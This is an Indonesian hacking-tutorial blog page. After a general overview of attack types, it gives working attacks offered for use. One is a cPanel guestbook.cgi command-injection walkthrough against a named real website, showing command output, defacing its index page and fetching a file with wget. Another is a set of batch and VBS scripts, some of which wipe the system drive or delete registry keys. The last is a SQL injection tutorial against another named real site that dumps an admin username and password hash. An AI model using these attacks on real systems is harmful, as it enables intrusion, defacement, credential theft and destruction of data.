Belajar Hacking

tutorial hacking, tools hacking, free tools, hacking, deface, facebook hacking, hack FB, gratis software, artikel hacking, cara hacking


ShoutMix chat widget

Counter

Google translate

Sponsored


Masukkan Code ini K1-EBD4CE-A
untuk berbelanja di KutuKutuBuku.com Ranking Search Engine
free counters

Alexa Siteinfo

Submit Your Site To The Web's Top 50 Search Engines for Free!
Search Engine Optimization and SEO Tools Sonic Run: Internet Search Engine

sms gratis ke semua operator

Followers

Cara dan Jenis Hacker Menyerang

Cara dan Jenis Hacker Menyerang

Dalam dunia hacking (tepatnya cracking ding!?) dikenal beberapa jenis serangan terhadap
server. Berikut ini jenis-jenis serangan dasar yang dapat dikelompokkan dalam minimal 6
kelas, yaitu:

Intrusion

Pada jenis serangan ini seorang cracker (umumnya sudah level hacker) akan dapat
menggunakan sistem komputer server. Serangan ini lebih terfokus pada full access granted
dan tidak bertujuan merusak. Jenis serangan ini pula yg diterapkan oleh para hacker untuk
menguji keamanan sistem jaringan mereka. Dilakukan dalam beberapa tahap dan tidak dalam
skema kerja spesifik pada setiap serangannya (dijelaskan pada artikel lain).
Hacking is an Art!? =)

Denial of Services (DoS)

Penyerangan pada jenis DoS mengakibatkan layanan server mengalami stuck karena kebanjiran
request oleh mesin penyerang. Pada contoh kasus Distributed Denial of Services (DDoS)
misalnya; dengan menggunakan mesin-mesin zombie, sang penyerang akan melakukan packeting
request pada server secara serentak asimetris dan simultan sehingga buffer server akan
kelabakan menjawabnya!? Stuck/hung akan menimpa server. Jadi bukan server lagi namanya!?
(servicenya mati masak dibilang server? hehehe....)

Joyrider

Nah, ini namanya serangan iseng!? Karena kebanyakan baca novel-novel hacking dan gak bisa
belajar benar, isenglah jadinya nyoba-nyoba nyerang pake ilmu-ilmu instan super cepat
(istilahnya 'onani' dimesin orang). Atau dengan alasan pengen tau isinya mesin orang!? =).
Yang jelas serangan jenis ini rata-rata karena rasa ingin tau, tapi ada juga yang sampe
menyebabkan kerusakan atau kehilangan data.

Vandal

Jenis serangan spesialis pengrusak!? nothing else to explain mbah!? =)

Scorekeeper

Serangan yang bertujuan mencapai reputasi hasil cracking terbanyak. Biasanya hanya
berbentuk deface halaman web (index/nambah halaman) dengan memampangakan NickName dan
kelompok tertentu. Sebagian besar masih tidak perduli dengan isi mesin sasarannya =).
Saat ini jenis penyerang ini lebih dikenal dengan sebutan WannaBe/Script kiddies.

Spy

Tiga hurup saja. Jenis serangan untuk memperoleh data atau informasi rahasia dari mesin
target. Biasanya menyerang pada mesin-mesin dengan aplikasi database didalamnya. Kadang
kala suatu perusahaan menyewa 'mata-mata' untuk mencuri data perusahaan rivalnya


1. IP Spoofing

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga
sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar
network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan
serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari
Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’
packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk
routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah
untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker
tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.

2. FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang
diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk
mendapatkan command shell ataupun untuk melakukan Denial Of Service.
Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil
resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang
attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa
membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang
diserang.

Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering
dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki.
Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di
upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow
Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce
attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff
informasi yang berada dalam sistem.


3. Unix Finger Exploits

Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi
diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan
peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang
sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk
melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga
menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada
dalam sistem dan seberapa jauh user merawat sistem.

Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah
sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi
seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk
memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.


4. Flooding & Broadcasting

Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara
significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa
menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan
dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua
station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini
adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya
menyerah.

Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or
volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas
besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu
network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup
power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas
proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar
akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

5. Fragmented Packet Attacks

Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya
mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa
firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi
alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash.
Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk
menulis ulang informasi paket pertama dari suatu protokol.


6. E-mail Exploits

Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command
manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode
(malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email
bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file
aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).

7. DNS and BIND Vulnerabilities

Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain
(BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis
yang diarahkan pada operasi dasar dari Internet (basic internet operation).

8. Password Attacks

Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak
perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi
online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP.
Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin
saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka
sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang
dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih
karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat
meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai
hal ini dengan cara teknikal. Kebnayakan seranagn yang dilakukan terhadap password adalah menebak
(guessing), brute force, cracking dan sniffing.


9.Proxy Server Attacks

Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan
proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai
kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem
saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.


10. Remote Command Processing Attacks

Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource
sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota
network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan
pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi
perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack

Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel)
yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network
dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk
mendapatkan akses ke direktori file.

12. Selective Program Insertions

Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program
penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ☺) pada
system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini
mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan
membuka backdoor.


13. Port Scanning

Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai
macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi.
Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk
publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception

TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan
informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force,
serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.

15. HTTPD Attacks

Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd
bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan
untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat
overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan
string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker
akses ke command prompt.

Mengexploitasi Cpanel

Mengexploitasi Cpanel

Mengeksploitasi Cpanel <= 5
CPanel adalah control panel untuk web-web hosting yang sangat populer..
hampir 80% web hosting menggunakan CPanel karena kemudahannya..

Di CPanel versi <= 5 (beberapa gw tes 5.3 bisa masuk juga), ada vulnerability
di guestbook.cgi CPanelnya yang memungkinkan semua orang untuk menginject code
dengan user id domain tersebut....


lebih lanjut...
OK.. sekarang kita cari target dulu...
untuk tau satu website itu diinstall cpanel ato gak, coba buka www.domain.com:2082 ato www.domain.com:2086 di browser.
ntar kalo diprompt untuk password, berarti terinstall sekaligus bisa check versi dari cpanel tersebut.
nach.. setelah dapat... kita inject aja code kita ke website itu.

-----------------
input: http://www.gamerxonline.com/cgi-sys/...ate=|uname+-a| --> masukkan ini ke browser
output: Linux host5.hostsoln.com 2.4.18-10 #1 Wed Aug 7 11:39:21 EDT 2002 i686 unknown
--------------------

wow... keren.. server linux + cpanel ada lubang
skrg kita coba liat kita dapat akses apa di server tersebut....

----------------
input: http://www.gamerxonline.com/cgi-sys/...&template=|id|
output: uid=32050(gamerx) gid=551(gamerx) groups=551(gamerx)
---------------

wach... cuman id biasa aja, gak ada root
tapi gak papa dengan id ini aja udah bisa deface site itu kekeke....
sekarang kita cari dimana home directory dari domain ini...

---------------
input: http://www.gamerxonline.com/cgi-sys/...ate=|ls+/home|
output: ... flange food fpa frankie frenzz fsguide gamerx giankc gideon glennng gotech gotrail griffin griffins h8mie...
--------------

tuch nampak di directory /home (yang ditebak) ada directory gamerx,..
kayaknya home directory dari website yang mau kita hajar...
coba liat lagi ke dalam.....

--------------
input: http://www.gamerxonline.com/cgi-sys/...+/home/gamerx|
output: IDM Michael Perlin Remy etc mail public_ftp public_html tmp www
--------------

siip... ada public_html
gw ingat di hosting hosting gratis.. biasanya file file ditaruh di sana...
tes lagi....

-------------
input: http://www.gamerxonline.com/cgi-sys/...x/public_html|
output: ADDONS-MODULES BLOCKS CHANGES COPYING CREDITS INSTALL PHP-Nuke-5.6.tar.gz README SUPPORT TODO TRANSLATIONS UPGRADE cgi-bin clans forum forums gamerx.gif gamerxenter.gif html index.html lan sql
---------------

mantapp... ini dia yang gw cari.. "index.html"
sekarang tinggal deface aja pake perintah echo macam zaman zaman unicode dulu

------------
input: http://www.gamerxonline.com/cgi-sys/guestbook.cgi?user=cpanel&template=|echo+Boom!+>+/home/gamerx/public_html/index.html|
output: lha... kok gak ada output?????
------------

grrr.... coba ke www.gamerxonline.com
wow.. nampak "Boom!" nya
kekekekekekeke... siip.. berhasil....

tunggu.. dulu... gw inget kalo web hostingan pasti ngehost banyak websites....
mmm....
coba check dech configurasi httpd.confnya, liat ada virtual2 hosts yg di host gak...

------------
input: http://www.gamerxonline.com/cgi-sys/...nf/httpd.conf|
output: .... .... etc... ... ServerAlias www.ourwedding-ceremony.com ourwedding-ceremony.com ServerAdmin webmaster@ourwedding-ceremony.com DocumentRoot /home/cmli/public_html .... etc ... etc....
------------

wow.. gila.. ada 300 lebih sites yang dihosting....
mangsa yang enak dimakan mwhahahahaha....
langsung nampak home directorynya lagi ama domain siip.. gak usah tebak tebak....
ato lebih mudah check /etc/userdomains (lebih simple)
---------------------
input: http://www.gamerxonline.com/cgi-sys/...c/userdomains|
[THX to AS_ROMA]
----------------------

heh.. lho.. kok kalo echo lebih dari 1 kata gak bisa??
aneh... padahal dulu zaman unicode bisa...
gini dech.. kita pake wget...
kamu masukkan file kamu di hosting hosting gratis....
terus input ini:

http://www.gamerxonline.com/cgi-sys/...ml/index.html|

siip.. siip.. sekarang 100 kata pun bukan jadi masalah lagi

Silahkan berpetualang!!! (Long Live Indonesian Hackers)

Regards,

Edelweize
http://www.indonesianhacker.org

Notepad Tricks

Notepad Tricks

Sebelumnya saya berpesan jangan dicoba di komputer atau notebook sendiri, segala resiko atas penggunaan tulisan saya ini diluar tanggung jawab saya.

1. Cycle Message on computer...

@ECHO off
:Begin
msg * Hai
msg * Lagi sibuk yah?
msg * Ikutan dong
msg * Maaf yah
msg * MOGSAW|NEWBIE
msg * HAS OWNED URE SYSTEM!!!
GOTO BEGIN

Save Notepad dengan extention *nama file terserah*.BAT

2. Kirim pesan dan SHUTDOWN...

@echo off
msg * Please jangan ganggu gw
shutdown -c "Error! MOGSAW|NEWBIE was here!" -s

Save dengan Ex .BAT

3. Caps Lock MODE|ON...

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save dengan Ex .VBS

4. PopUp CD Drive...

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save dengan Ex .VBS

5. Hit Enter MODE|ON...

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save dengan Ex .VBS

6. Backspace MODE|ON...

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save dengan Ex .VBS

7. Membuka Notepad dengan terus-menerus...

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save dengan Ex .BAT

8. Pilihan sulit...
Ini akan memunculkan pilihan-pilihan...
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown

@echo off
title Tentukan pilihanmu!!!
cd C:\
:menu
cls
echo Saya tidak menjamin pilihanmu..semua tergantung keberuntunganmu hari ini. Jangan pernak mengklik 'x' atau hari ini akan menjadi neraka buatmu. Saya tidak bertanggung jawab apabila komputermu terformat TOTAL dengan mengklik 'x'. Tentukan pilihanmu...
pause
echo Apa pilihanmu:
echo 1. Aku beruntung
echo 2. Aku Beruntung
echo 3. KALO YANG INI KURANG BERUNTUNG
echo 4. Aku Beruntung
echo 5. Akusangat beruntung
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save dengan Ex .BAT

9. Blue Screen Of Death...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save dengan Ex .BAT

10. Delete Key Registry Files...

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fucked. Have a nice day.
GOTO MESSAGE

Save dengan Ex .BAT

Segala resiko ditanggung masing-masing, Semoga Bermanfaat...

DASAR SQL Injection Dengan Schemafuzz

DASAR SQL Injection Dengan Schemafuzz

Sesuai dengan judul, sebenernya yang mau gw tulis ini basi banget..kalo kita coba cari di google, bejibun deh tutorial yang keluar...berhubung gw jg masi belajar, n kebiasaan gw orangnya lupaan. Jadi gw jadiin artikel ajah disini biar gw jg gag lupa...huehuehuehuehuehehehehehhe...jadi intinya itu tulisan ini KHUSUS diperuntukan ke neubi kek gw, untuk kk kk webmaster sekalian silahkan diliat ajah n dikoreksi kalo ada yang salah... =P

hwokehhh...jadi darimana nih dimulai...Yang perlu disiapin itu adalah...
1. PHYTON bisa di dongdot DISINI
2. SCHEMAFUZZ v.5 bisa di dongdot DISINI
3. COMMAND PROMPT...
4. ROKOK..
5. KOPI...
6. Anggur merah atau SEJENISNYA... =P

Yups..semua sudah tersedia??? Kita bisa mulai...Pertama2 kita cari dulu halaman web yang VULN atau halaman web yang apabila ditambahkan objek tambahan akan muncul pesan error. Kita belum masuk ke SCHEMAFUZZ yah, masi di browsing page...disini gw pake web
http://www.sligotoday.ie/details.php?id=5148

Udah ada kan web target...untuk manggil pesan error atau kata lainnya ngetest halaman web ini VULN atau tidak, kasi perintah ' atau - di belakang angka 5148. Yang harus diperhatikan disini [spasi] bisa sama saja dengan + ataupun %20 yah...jadi jangan heran kalo tiba2 kok spasinya gag ada atau berubah...
http://www.sligotoday.ie/details.php?id=-5148

Yang nantinya bakal nongol pesan error kayak gini...



Wokeh...setelah itu kita cari ada berapa sih column sql yang ada di web itu...perintahnya adalah order by n-- n yang dimaksud ini adalah angka yang diisi untuk ngecek ada berapa sih column yang ada. Perintah itu ditambahkan setelah -5148. Awalnya yang kita gunakan adalah n=1 dicari satu per satu sampai pesan error yang muncul berubah...contoh...

http://www.sligotoday.ie/details.php?id=-5148 order by 1--

http://www.sligotoday.ie/details.php?id=-5148 order by 2--

http://www.sligotoday.ie/details.php?id=-5148 order by 3--

terus dicoba n diganti angka belakangnya sampai pesan error berubah..disini pesan error berubah di angka 10 atau di URL

http://www.sligotoday.ie/details.php?id=-5148 order by 10--

Pesan Error yang muncul....

Nah berarti bisa diambil kesimpulan kalo web ini punya 9 column sql...Setelah itu kita cari ada dimana column yang bisa kita inject...Perintahnya pake Union Select perhatikan letak dimana Union Select itu ditempatkan

http://www.sligotoday.ie/details.php?id=-5148 union select 1,2,3,4,5,6,7,8,9--

nanti keliatan deh angka yang bisa di inject [angka 2..karena angka 2 ini beda sama yang lain..terlihat lebih besar]

Mungkin ada pertanyaan kok cuma sampe angka 9 yah???padahal ordernya itu sampe 10...Gw gag bisa jawab,takut salah... =P pokoknya kalo pesan errornya berubah, order terakhir itu jangan dimasukin ke angka2 di union select...

------------------------------------------

key sampe tahap ini baru kita mulai masuk ke SCHEMAFUZZ...udah diinstall kan???diperhatiin ya lokasi dimana SCHEMAFUZZ itu diinstall, contoh gw disini gw install di C:\>...kalo SCHEMAFUZZ itu gag bisa dieksekusi, berarti PHYTON nya lum diinstal...jangan lupa install PHYTON jg...

Ini perintah2 dasar yang ada di SCHEMAFUZZ atawa lengkapnya bisa dieksekusi di...

C:\>schemafuzz.py -h
--dbs [untuk mengetahui nama database sql]
--schema [untuk melihat nama tabel n nama column]
--dump [untuk melihat isi dari column]
Itu singkat gw tulis sesuai dengan urutan atau tahapan ngebedah tabel sql nya...
Yuk mulai...Ketik perintah

C:\>schemafuzz.py --dbs -u "[web yang terakhir tadi kita liat untuk ngeliat angka tabel]"

nanti dulu....jangan di enter..soalnya harus ada yang dirubah perintahnya...diangka yang tadi itu [disini kita gunain angka 2 yang muncul] dirubah jadi darkc0de [0 angka nol yah bukan huruf o]

C:\>schemafuzz.py --dbs -u "www.sligotoday.ie/details.php?id=-5148 union select 1,darkc0de,3,4,5,6,7,8,9"

Muncul kan tuh nama databasenya ada di tulisan Database: Sligotoday_news Tahap selanjutnya adalah ubah perintah --dbs jadi --schema n tambahin jg perintah -D [nama database] dibelakang url tadi... Perintah ini untuk ngeliat nama table n nama column...

C:\>schemafuzz.py --schema -u "www.sligotoday.ie/details.php?id=-5148 union select 1,darkc0de,3,4,5,6,7,8,9" -D sligotoday_news

Yups perhatikan baik2...paham kan mana Table n mana column...gw kasi sedikit deh...Cari n liat tulisan [table:column] dah ketemu... Nah yang nama2 table itu admin,adverts,articles,dll...terus yang nama column itu setelah : dari nama tabel.... key lanjut...cari tujuan utama kita mau liat apa???nama ADMIN n PASSWORD...Berarti table ama column yang kita mau eksekusi adalah admin:id,user,pass ... Ubah perintah --schema jadi --dump n tambahin perintah -T [nama table yang disini nama tablenya admin] -C [nama column yang disini nama columnnya id,user,admin] setelah -D sligotoday_news tadi... perintah ini untuk ngebuka nama admin n passwordnya...

C:\>schemafuzz.py --dump -u "www.sligotoday.ie/details.php?id=-5148 union select 1,darkc0de,3,4,5,6,7,8,9" -D sligotoday -T admin -C id,user,pass

WHooookkkeeeehhhhh...kebuka kan tuh isi dari column id,user,pass... 2[id]:Plunkett[user]:f0cc4a935326c97d7f46281e288a99e6[pass] huehuehuehehehhehehe...tapi passwordnya masi berupa MD5 Tinggal dicari liwat google... ^.^ Ciao...semoga tulisan ini bermanfaat yah...Biar gw jg gag lupa.... ^.^

Sepakbola